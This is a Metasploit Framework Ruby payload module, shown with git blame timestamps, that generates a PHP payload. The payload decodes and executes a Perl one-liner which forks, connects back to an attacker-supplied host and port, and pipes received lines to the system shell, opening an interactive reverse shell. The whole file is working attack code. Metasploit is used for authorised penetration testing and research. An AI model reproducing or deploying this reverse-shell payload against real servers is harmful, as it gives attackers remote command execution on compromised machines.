Files
metasploit-gs/modules/payloads/singles/php/reverse_perl.rb
T

61 lines
1.7 KiB
Ruby
Raw Normal View History

##
2010-02-24 01:19:59 +00:00
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
2006-12-17 07:57:51 +00:00
require 'msf/core'
2008-07-01 01:44:56 +00:00
require 'msf/core/payload/php'
2006-12-17 07:57:51 +00:00
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
2010-02-24 01:19:59 +00:00
require 'msf/base/sessions/command_shell_options'
2006-12-17 07:57:51 +00:00
module Metasploit3
2006-12-17 07:57:51 +00:00
include Msf::Payload::Single
2008-07-01 01:44:56 +00:00
include Msf::Payload::Php
2010-02-24 01:19:59 +00:00
include Msf::Sessions::CommandShellOptions
2006-12-17 07:57:51 +00:00
def initialize(info = {})
super(merge_info(info,
2012-08-07 15:59:01 -05:00
'Name' => 'PHP Command, Double reverse TCP connection (via Perl)',
2006-12-17 07:57:51 +00:00
'Description' => 'Creates an interactive shell via perl',
'Author' => 'cazz',
'License' => BSD_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
2008-07-01 01:44:56 +00:00
buf = "#{php_preamble}"
buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"
buf += "#{php_system_block({:cmd_varname=>"$c"})}"
return super + buf
2010-02-24 01:19:59 +00:00
2006-12-17 07:57:51 +00:00
end
2010-02-24 01:19:59 +00:00
2006-12-17 07:57:51 +00:00
#
# Returns the command string to use for execution
#
def command_string
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
2006-12-17 07:57:51 +00:00
end
2010-02-24 01:19:59 +00:00
end